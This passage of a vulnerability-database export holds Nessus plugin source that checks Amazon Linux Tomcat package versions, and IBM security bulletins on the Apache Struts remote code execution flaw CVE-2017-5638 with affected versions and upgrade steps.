audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-admin-webapps-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-docs-webapp-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-el-2.2-api-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-javadoc-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-jsp-2.2-api-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-lib-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-log4j-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-servlet-3.0-api-7.0.73-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat7-webapps-7.0.73-1.23.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat7 / tomcat7-admin-webapps / tomcat7-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-04T14:28:21", "description": "CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : tomcat6 (ALAS-2016-776)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:tomcat6", "p-cpe:/a:amazon:linux:tomcat6-admin-webapps", "p-cpe:/a:amazon:linux:tomcat6-el-2.1-api", "p-cpe:/a:amazon:linux:tomcat6-docs-webapp", "p-cpe:/a:amazon:linux:tomcat6-javadoc", "p-cpe:/a:amazon:linux:tomcat6-jsp-2.1-api", "p-cpe:/a:amazon:linux:tomcat6-lib", "p-cpe:/a:amazon:linux:tomcat6-servlet-2.5-api", "p-cpe:/a:amazon:linux:tomcat6-webapps", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-776.NASL", "href": "https://www.tenable.com/plugins/nessus/95896", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-776.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95896);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8735\");\n script_xref(name:\"ALAS\", value:\"2016-776\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Amazon Linux AMI : tomcat6 (ALAS-2016-776)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to\npermitting invalid character in HTTP requests\n\nCVE-2016-8735 tomcat: Remote code execution vulnerability in\nJmxRemoteLifecycleListener\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2016-776.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat6' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-el-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat6-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-admin-webapps-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-docs-webapp-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-el-2.1-api-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-javadoc-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-jsp-2.1-api-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-lib-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-servlet-2.5-api-6.0.48-1.8.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat6-webapps-6.0.48-1.8.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat6 / tomcat6-admin-webapps / tomcat6-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "ibm": [{"lastseen": "2023-02-13T09:36:02", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of Storwize V7000 Unified allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM Storwize V7000 Unified \nThe product is affected when running code releases 1.5.x and 1.6.0.0 to 1.6.2.1\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.6.2.2 of IBM Storwize V7000 Unified. Version 1.5 is end of service. Customers running on this release of IBM Storwize V7000 Unified can upgrade to v1.6.2.2 for a fix. \n \n[_Latest Storwize V7000 Unified Software_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003918&myns=s028&mynp=OCST5Q4U&mync=E>) \n \nPlease contact IBM support for assistance in upgrading your system.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:34:31", "type": "ibm", "title": "Security Bulletin:Vulnerability in Apache Struts affects Storwize V7000 Unified (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:34:31", "id": "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "href": "https://www.ibm.com/support/pages/node/697609", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:33", "description": "## Summary\n\nIBM Sterling Order Management use Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0 \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.5.0| **_9.5.0-SFP2_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP3_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP5_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T20:09:19", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management is affected by a vulnerability (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-16T20:09:19", "id": "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "href": "https://www.ibm.com/support/pages/node/558281", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T18:05:40", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of SAN Volume Controller, Storwize family and FlashSystem V9000 products allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \n \nAll products are affected when running supported releases 7.1 to 7.8. For unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of the product.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest SAN Volume Controller Code_](<http://www-01.ibm.com/support/docview.wss?rs=591&uid=ssg1S1001707>) \n[_Latest Storwize V7000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003705>) \n[_Latest Storwize V5000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004336>) \n[_Latest Storwize V3700 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004172>) \n[_Latest Storwize V3500 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004171>) \n \nFor IBM FlashSystem V9000, upgrade to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects SAN Volume Controller, Storwize family and FlashSystem V9000 products (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-03-29T01:48:02", "id": "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "href": "https://www.ibm.com/support/pages/node/697171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:34", "description": "## Summary\n\nIBM OpenPages GRC Platform Web Applications are not vulnerable to the Apache Struts 2 vulnerability CVE-2017-5638 \n\n## Vulnerability Details\n\nIBM OpenPages GRC Platform Web Applications are NOT vulnerable to the Apache Struts 2 vulnerability (CVE-2017-5638). \nPlease refer to [_https://cwiki.apache.org/confluence/display/WW/S2-045_](<https://cwiki.apache.org/confluence/display/WW/S2-045>) for more information on CVE-2017-5638.\n\n## Affected Products and Versions\n\nIBM OpenPages versions 7.0 through 7.3\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:49:16", "type": "ibm", "title": "Security Bulletin: IBM OpenPages GRC Platform Web Applications are not vulnerable to (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:49:16", "id": "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5", "href": "https://www.ibm.com/support/pages/node/294331", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:52:11", "description": "## Summary\n\nA Security vulnerability relating to remote code execution CVE-2017-5638 (S2-045) has been reported against Apache Struts 2, which IBM Platform Symphony uses as a framework for its WEBGUI service. The Struts 2 package version that is vulnerable to these issues is included in several past versions of IBM Platform Symphony Advanced Edition and Developer Edition. Struts 2.3.32 addresses this vulnerability and can be applied through the manual steps detailed in the Remediation section.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)\n\n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \n\n**CVSS Base Score:** **7.3**\n\n**CVSS Temporal Score: See **[**_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \n\n**CVSS 3.0 Environmental Score*:** **Undefined**\n\n**CVSS Vector:** **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)**\n\n## Affected Products and Versions\n\nIBM Platform Symphony **6.1.1, 7.1 Fix Pack 1**, and** 7.1.1**,** **and** **IBM Spectrum Symphony** 7.1.2** and **7.2**. All OS editions, including Linux and Windows, are affected. The remediation steps for Linux are provided in this document. For Windows, use the Linux steps as a reference and find the correct path for patching.\n\n## Remediation/Fixes\n\n1\\. For IBM Platform Symphony 6.1.1 or 7.1 Fix Pack 1, download the appropriate fix and follow the instructions in the readme file to upgrade to Struts version 2.3.32. \n\n**Product version**| **Fix ID** \n---|--- \nIBM Platform Symphony **6.1.1**| [_sym-6.1.1-build446371_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-6.1.1-build446371&includeSupersedes=0>) \nIBM Platform Symphony **7.1 Fix Pack 1**| [_sym-7.1-build446807_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1-build446807&includeSupersedes=0>) \n2\\. For IBM Platform Symphony 7.1.1 and higher, follow the steps to update to Struts version 2.3.32 on Linux hosts: 2.1 Log on to each management host in the cluster and download the struts-2.3.32-lib.zip package from the following location: [](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>)[_http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip_](<http://archive.apache.org/dist/struts/2.3.32/struts-2.3.32-lib.zip>) 2.2 Stop the Platform Management Console service (WEBGUI): &gt; egosh service stop WEBGUI 2.3 For backup purposes, move the following files, which will be replaced by new files: **\\- For IBM Platform Symphony 7.1.1:** \n&gt; mkdir -p /tmp/guibackup/symgui \n&gt; mkdir -p /tmp/guibackup/perfgui \n&gt; mv $EGO_TOP/gui/3.3/lib/commons-fileupload-1.3.1.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/3.3/lib/commons-io-1.2.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-fileupload-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/org.apache.commons-io-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/commons-lang3-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/javassist-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-json-plugin-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/struts2-spring-plugin-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xstream-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/symgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n&gt; mkdir -p /tmp/guibackup/egogui \n&gt; mkdir -p /tmp/guibackup/perfgui \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-fileupload-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-io-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/commons-lang3-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/org.apache.commons-io-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/freemarker-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/javassist-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/ognl-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-core-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-json-plugin-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-spring-plugin-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/gui/$EGO_VERSION/lib/xwork-core-*.jar /tmp/guibackup/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/xstream-*.jar /tmp/guibackup/egogui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/egogui/ \n&gt; mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui \n&gt; mv 